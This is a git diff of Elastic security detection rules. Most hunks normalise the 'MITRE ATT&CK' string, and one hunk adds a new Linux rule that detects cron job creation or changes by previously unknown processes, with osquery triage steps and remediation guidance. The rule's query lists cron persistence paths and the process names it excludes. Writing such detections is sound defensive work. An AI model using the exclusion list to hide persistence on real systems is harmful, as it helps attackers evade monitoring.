+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_101.json b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_101.json
index cf0f8da1de2..a02ddf722ff 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_101.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_102.json b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_102.json
index 72b552ff026..cff37dee840 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_102.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_103.json b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_103.json
index 09460cc3ed4..c584b957a61 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff013cb4-274d-434a-96bb-fe15ddd3ae92_103.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_1.json b/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_1.json
index ea4add81aca..13b7d30a439 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_1.json
@@ -41,7 +41,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_1.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_1.json
index 2489fd770a9..93ad15869ab 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_1.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -113,7 +113,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_2.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_2.json
index ef11d47855d..6fa29299181 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_2.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -112,7 +112,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_3.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_3.json
index aec110bc0c3..d28bcc09497 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_3.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -112,7 +112,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_4.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_4.json
index 6f3dcaf5d2d..4bb4b4996a8 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_4.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -113,7 +113,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_5.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_5.json
index ce2cecaf7a0..5ff5dfb304d 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_5.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -115,7 +115,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_6.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_6.json
index 26533b08243..d16205c5d48 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_6.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -115,7 +115,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_7.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_7.json
new file mode 100644
index 00000000000..a2176accb01
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_7.json
@@ -0,0 +1,147 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.",
+ "from": "now-9m",
+ "history_window_start": "now-10d",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Cron Job Created or Changed by Previously Unknown Process",
+ "new_terms_fields": [
+ "host.id",
+ "file.path",
+ "process.executable"
+ ],
+ "note": "## Triage and analysis\n\n### Investigating Cron Job Created or Changed by Previously Unknown Process\nLinux cron jobs are scheduled tasks that run at specified intervals or times, managed by the cron daemon. \n\nBy creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors the creation of previously unknown cron jobs by monitoring for file creation events in the most common cron job task location directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the cron job file that was created or modified.\n- Investigate whether any other files in any of the available cron job directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/etc/cron.allow.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/cron.hourly/%' OR\\n path LIKE '/etc/cron.daily/%' OR\\n path LIKE '/etc/cron.weekly/%' OR\\n path LIKE '/etc/cron.monthly/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (\\n path = '/etc/cron.allow' OR\\n path = '/etc/cron.deny' OR\\n path = '/etc/crontab' OR\\n path = '/usr/sbin/cron' OR\\n path = '/usr/sbin/anacron'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/etc/cron.allow.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/cron.hourly/%' OR\\n path LIKE '/etc/cron.daily/%' OR\\n path LIKE '/etc/cron.weekly/%' OR\\n path LIKE '/etc/cron.monthly/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - 
!{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are 
identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "host.os.type : \"linux\" and event.action : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and \nfile.path : (/etc/cron.allow or /etc/cron.deny or /etc/cron.d/* or /etc/cron.hourly/* or /etc/cron.daily/* or \n/etc/cron.weekly/* or /etc/cron.monthly/* or /etc/crontab or /usr/sbin/cron or /usr/sbin/anacron) \nand not (process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"snapd\" or \"yum\" or \"exe\" or \"dnf\" or \"5\") or \nfile.extension : (\"swp\" or \"swpx\"))\n",
+ "references": [
+ "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1053",
+ "name": "Scheduled Task/Job",
+ "reference": "https://attack.mitre.org/techniques/T1053/",
+ "subtechnique": [
+ {
+ "id": "T1053.003",
+ "name": "Cron",
+ "reference": "https://attack.mitre.org/techniques/T1053/003/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1053",
+ "name": "Scheduled Task/Job",
+ "reference": "https://attack.mitre.org/techniques/T1053/",
+ "subtechnique": [
+ {
+ "id": "T1053.003",
+ "name": "Cron",
+ "reference": "https://attack.mitre.org/techniques/T1053/003/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1053",
+ "name": "Scheduled Task/Job",
+ "reference": 
"https://attack.mitre.org/techniques/T1053/",
+ "subtechnique": [
+ {
+ "id": "T1053.003",
+ "name": "Cron",
+ "reference": "https://attack.mitre.org/techniques/T1053/003/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "new_terms",
+ "version": 7
+ },
+ "id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9_7",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_1.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_1.json
index 8fbb61a3225..58009da9e2f 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_1.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_2.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_2.json
index f1156fa06ea..75dee4330a0 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_2.json
@@ -49,7 +49,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_3.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_3.json
index 56b2e2705ef..3faf42081cd 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_3.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_4.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_4.json
index fc34ab01a84..58d8dc6e765 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_4.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -78,7 +78,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_5.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_5.json
index 3da05a000c3..95ca80c567b 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_5.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_101.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_101.json
index da4ac0419e3..f07bdff08e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_101.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_102.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_102.json
index 153692938d4..dbe867c08d4 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_103.json b/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_103.json
index 4149063618e..2b681fe8348 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_103.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_104.json b/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_104.json
index 0ebf7cf18f8..844b20c3b18 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff9b571e-61d6-4f6c-9561-eb4cca3bafe1_104.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_1.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_1.json
index b5c920b87b1..20882b870ac 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_1.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_2.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_2.json
index a476b434b75..b9d0a6d8203 100644
--- a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_2.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
